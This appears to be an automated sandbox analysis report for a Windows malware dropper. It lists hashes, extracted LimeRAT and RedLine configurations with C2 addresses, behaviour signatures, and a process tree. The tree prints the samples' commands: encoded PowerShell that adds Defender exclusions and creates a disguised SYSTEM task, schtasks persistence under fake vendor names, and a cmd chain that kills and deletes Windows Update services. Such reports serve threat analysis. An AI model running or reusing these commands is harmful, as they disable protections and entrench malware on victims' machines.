Resubmissions

06-09-2022 03:04

220906-dk2dasbcam 10

24-08-2022 20:26

220824-y7t8qaaffp 10

Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-08-2022 20:26

General

  • Target

    a18193c95d0c31ab132d9bc2da884d7c.exe

  • Size

    22.0MB

  • MD5

    a18193c95d0c31ab132d9bc2da884d7c

  • SHA1

    063e58b4b3b920e68006d4d28625df894e20750a

  • SHA256

    6d6ebf1870d5d9c6bfebdc9fee3a3f381f86b32770f34df41364f905a489486c

  • SHA512

    1c5119a13ddbbe2293759e5cd66de8747abba98d46aa9883c1ccadb489a2cf54be58766aa157fd383a6f631c9265d7b873c068fd992c6dc592ab32a6afd10547

  • SSDEEP

    393216:TJWrtpiMPeMNKxIyMMUGJQmNVmIRKGl5X1+moeWJIYR22uYZm:kpWMtMUJ+KG3XsmOZFpm

Malware Config

Extracted

Family

limerat

Attributes
  • aes_key

    123

  • antivm

    true

  • c2_url

    https://pastebin.com/raw/mchxnAbT

  • delay

    80

  • download_payload

    false

  • install

    true

  • install_name

    WindosCert.exe

  • main_folder

    AppData

  • pin_spread

    true

  • sub_folder

    \

  • usb_spread

    true

Extracted

Family

redline

C2

193.106.191.16:28958

193.106.191.106:26883

62.204.41.141:24758

193.124.22.40:19788

Attributes
  • auth_value

    057b2256d154683c7559f6a91f04717e

Extracted

Family

redline

Botnet

@Miroskati

C2

litrazalilibe.xyz:81

Attributes
  • auth_value

    384ebbf9bd4d7e80bf3269909b298f87

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • Modifies security service 2 TTPs 5 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 5 IoCs
  • Enumerates VirtualBox registry keys 2 TTPs 10 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 2 IoCs
  • XMRig Miner payload 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 24 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • VMProtect packed file 17 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a18193c95d0c31ab132d9bc2da884d7c.exe
    "C:\Users\Admin\AppData\Local\Temp\a18193c95d0c31ab132d9bc2da884d7c.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAdABkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAZgB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAdQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdABrACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:528
    • C:\Users\Admin\AppData\Local\Temp\1.exe
      "C:\Users\Admin\AppData\Local\Temp\1.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious behavior: EnumeratesProcesses
      PID:4876
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "UpdateChromeDay" /tr '"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"' & exit
        3⤵
          PID:246388
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "UpdateChromeDay" /tr '"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"'
            4⤵
            • Creates scheduled task(s)
            PID:246468
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDB5C.tmp.bat""
          3⤵
            PID:246404
            • C:\Windows\SysWOW64\timeout.exe
              timeout 3
              4⤵
              • Delays execution with timeout.exe
              PID:246492
            • C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe
              "C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"
              4⤵
              • Executes dropped EXE
              PID:246620
        • C:\Users\Admin\AppData\Local\Temp\2.exe
          "C:\Users\Admin\AppData\Local\Temp\2.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1392
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            3⤵
              PID:578276
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 578276 -s 204
                4⤵
                • Program crash
                PID:68968
          • C:\Users\Admin\AppData\Local\Temp\3.exe
            "C:\Users\Admin\AppData\Local\Temp\3.exe"
            2⤵
            • Enumerates VirtualBox registry keys
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Looks for VirtualBox Guest Additions in registry
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            PID:3900
            • C:\ProgramData\GeForce\Lib\COM Surrogate.exe
              "C:\ProgramData\GeForce\Lib\COM Surrogate.exe"
              3⤵
              • Enumerates VirtualBox registry keys
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Looks for VirtualBox Guest Additions in registry
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:153228
              • C:\Windows\SYSTEM32\cmd.exe
                cmd /c schtasks /create /sc MINUTE /mo 1 /tn "VLC\MediaDriver" /tr "C:\ProgramData\GeForce\Lib\COM Surrogate.exe" /f
                4⤵
                  PID:191440
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /sc MINUTE /mo 1 /tn "VLC\MediaDriver" /tr "C:\ProgramData\GeForce\Lib\COM Surrogate.exe" /f
                    5⤵
                    • Creates scheduled task(s)
                    PID:245500
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd /c schtasks /create /sc MINUTE /mo 1 /tn "Mozilla\Firefox Default Browser Agent AB3751B1JF7410A0" /tr "C:\ProgramData\GeForce\Lib\COM Surrogate.exe" /f
                  4⤵
                    PID:201688
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /sc MINUTE /mo 1 /tn "Mozilla\Firefox Default Browser Agent AB3751B1JF7410A0" /tr "C:\ProgramData\GeForce\Lib\COM Surrogate.exe" /f
                      5⤵
                      • Creates scheduled task(s)
                      PID:212824
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd /c schtasks /create /sc MINUTE /mo 10 /tn "VLC\MediaDriverDriver" /tr "C:\ProgramData\GeForce\Lib\COM Surrogate.exe" /f
                    4⤵
                      PID:191452
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /sc MINUTE /mo 10 /tn "VLC\MediaDriverDriver" /tr "C:\ProgramData\GeForce\Lib\COM Surrogate.exe" /f
                        5⤵
                        • Creates scheduled task(s)
                        PID:210372
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\3.exe >> NUL
                    3⤵
                      PID:153288
                  • C:\Users\Admin\AppData\Local\Temp\5.exe
                    "C:\Users\Admin\AppData\Local\Temp\5.exe"
                    2⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    PID:2404
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\WindosCert.exe'"
                      3⤵
                      • Creates scheduled task(s)
                      PID:246528
                    • C:\Users\Admin\AppData\Roaming\WindosCert.exe
                      "C:\Users\Admin\AppData\Roaming\WindosCert.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:246576
                  • C:\Users\Admin\AppData\Local\Temp\7.exe
                    "C:\Users\Admin\AppData\Local\Temp\7.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:1860
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                      3⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:120408
                  • C:\Users\Admin\AppData\Local\Temp\9.exe
                    "C:\Users\Admin\AppData\Local\Temp\9.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of WriteProcessMemory
                    PID:3000
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                      3⤵
                        PID:578284
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 578284 -s 792
                          4⤵
                          • Program crash
                          PID:152144
                    • C:\Users\Admin\AppData\Local\Temp\11.exe
                      "C:\Users\Admin\AppData\Local\Temp\11.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:7816
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                        3⤵
                          PID:578268
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                          3⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2316
                      • C:\Users\Admin\AppData\Local\Temp\10.exe
                        "C:\Users\Admin\AppData\Local\Temp\10.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:10352
                      • C:\Users\Admin\AppData\Local\Temp\v0.7.exe
                        "C:\Users\Admin\AppData\Local\Temp\v0.7.exe"
                        2⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:10472
                        • C:\Users\Admin\AppData\Local\Temp\Setup.exe
                          "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
                          3⤵
                          • Executes dropped EXE
                          • Checks computer location settings
                          • Adds Run key to start application
                          • Suspicious use of WriteProcessMemory
                          PID:166904
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe
                            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of WriteProcessMemory
                            PID:288860
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe
                              "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:588712
                        • C:\Users\Admin\AppData\Local\Temp\Setup.exe
                          "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
                          3⤵
                          • Executes dropped EXE
                          • Checks computer location settings
                          • Adds Run key to start application
                          • Suspicious use of WriteProcessMemory
                          PID:201792
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe
                            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of WriteProcessMemory
                            PID:291432
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe
                              "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:590104
                        • C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe
                          "C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe"
                          3⤵
                          • Executes dropped EXE
                          PID:245488
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 245488 -s 988
                            4⤵
                            • Program crash
                            PID:326556
                      • C:\Users\Admin\AppData\Local\Temp\8.exe
                        "C:\Users\Admin\AppData\Local\Temp\8.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:10396
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                          3⤵
                            PID:151996
                        • C:\Users\Admin\AppData\Local\Temp\6.exe
                          "C:\Users\Admin\AppData\Local\Temp\6.exe"
                          2⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Checks computer location settings
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4004
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                            3⤵
                              PID:153504
                              • C:\Windows\system32\sc.exe
                                sc stop UsoSvc
                                4⤵
                                • Launches sc.exe
                                PID:153036
                              • C:\Windows\system32\sc.exe
                                sc stop WaaSMedicSvc
                                4⤵
                                • Launches sc.exe
                                PID:153216
                              • C:\Windows\system32\sc.exe
                                sc stop wuauserv
                                4⤵
                                • Launches sc.exe
                                PID:153380
                              • C:\Windows\system32\sc.exe
                                sc stop bits
                                4⤵
                                • Launches sc.exe
                                PID:153576
                              • C:\Windows\system32\sc.exe
                                sc stop dosvc
                                4⤵
                                • Launches sc.exe
                                PID:152892
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                4⤵
                                • Modifies registry key
                                PID:152768
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                4⤵
                                • Modifies registry key
                                PID:153224
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                4⤵
                                • Modifies security service
                                • Modifies registry key
                                PID:153596
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                4⤵
                                • Modifies registry key
                                PID:153148
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                4⤵
                                • Modifies registry key
                                PID:153472
                              • C:\Windows\system32\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • Suspicious use of AdjustPrivilegeToken
                                PID:153028
                              • C:\Windows\system32\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:152968
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:153740
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:153788
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:153836
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:156668
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                4⤵
                                  PID:156488
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                  4⤵
                                    PID:172204
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                    4⤵
                                      PID:172248
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                      4⤵
                                        PID:172396
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                        4⤵
                                          PID:172508
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                          4⤵
                                            PID:172556
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                            4⤵
                                              PID:172604
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                            3⤵
                                              PID:152628
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-ac 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:153132
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-dc 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:153292
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-ac 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:153464
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-dc 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:152736
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAEUAQQBZAGcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGQAZwBCAHMAQQBHAFEAQQBjAFEAQQBqAEEARAA0AEEAIgAnACkAIAA8ACMAdQBzACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAcQBvAHMAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBpAGkAbwBhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAcQB1ACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwANgAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdAB6AGIAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAHMAZgAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnADsA"
                                              3⤵
                                              • Drops file in Program Files directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:153040
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAGsAcwBsACMAPgA="
                                          1⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:10516
                                        • C:\Windows\system32\WerFault.exe
                                          C:\Windows\system32\WerFault.exe -pss -s 408 -p 245488 -ip 245488
                                          1⤵
                                            PID:292144
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 578284 -ip 578284
                                            1⤵
                                              PID:19236
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 578276 -ip 578276
                                              1⤵
                                                PID:595476
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAdgBsAGQAcQAjAD4A"
                                                1⤵
                                                • Drops file in System32 directory
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:153640
                                                • C:\Program Files\Google\Chrome\updater.exe
                                                  "C:\Program Files\Google\Chrome\updater.exe"
                                                  2⤵
                                                  • Drops file in Drivers directory
                                                  • Executes dropped EXE
                                                  • Drops file in System32 directory
                                                  • Suspicious use of SetThreadContext
                                                  • Drops file in Program Files directory
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:172660
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
